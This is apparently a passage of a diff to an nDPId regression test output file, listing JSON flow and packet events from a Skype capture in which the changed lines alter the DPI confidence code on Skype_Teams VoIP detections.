+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1431969654389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969654389,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2YJcAAEARmtjAqAEib91NoDLdnFwAInstm5wC0d61W0FRabgFV8W1nkBP2OEpO4vgeHY="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1431969654389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969654389,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYWsAAEARhiPAqAEinTg0HDLdnEkALM83m54CE+gbUNd25CDT9n3foWmJBdcqOFnduxapZrLe74dYiza3"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1431969654389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969654389,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwK8AAEARb0vAqAEinTfrsDLdnFYALGUnm6AC1ZExgfTg8R8Kk2ngcBhiodhOGddomI+8IvUKr50t+FQG"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1431969654389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969654389,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2ttcAAEARMM7AqAEinTg0DzLdnFsAIgnVm6IClklzvpwg0J9RRu2barB5pBf+dP\/198s="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1431969654389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969654389,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6uggAAEARpzfAqAEiQAQXpTLdnFQAJvWzm6QCh3CXl6XGrqArz4Fq72vdiruIePdvscfnf8nL"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969655399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1431969655399,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969655399,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+KmIAAEARBSXAqAEi1cezljLdnEQAKk92m6YCxHNRXNt6saUbXJuaVxAVloiUB3Kd06UQ7eXoZ8Yw\/Q=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969655399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969655399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969655399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1431969655399,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969655399,"pkt":"0NQSxnP1PBXCt3IOCABFAAAysnAAAEARTIvAqAEib91KGDLdnEEAHsG9m6gCfNYVHSc6jWjicVy5t1mw5NpUpQ=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969655399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969655399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1431969655400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969655400,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9FyIAAEAR57bAqAEib91KMDLdnEgAKadmm6oC656jqkVeUmOjjlOF7oTonkHhDKTP6NWeDWkwfWY5"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1431969655400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969655400,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4PBwAAEARwsfAqAEib91KKjLdnFgAJKhzm6wCYALzkzdu\/LrNPcT4NWmc+JYpVJ3L9m5YbQ=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1431969655400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969655400,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1xDsAAEARa1jAqAEi1cezkjLdgQkAIXwbm64C\/E7GKHTAnqTXhScHNyy9JU+1q7MSwg=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":533,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1431969656410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969656410,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8yZkAAEARz2bAqAEinTeCrzLdnEYAKHoim7AC0Uz4eUhtRx+U2n96ruKge0mKrTm6r7jfF82JDy4="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":533,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":533,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 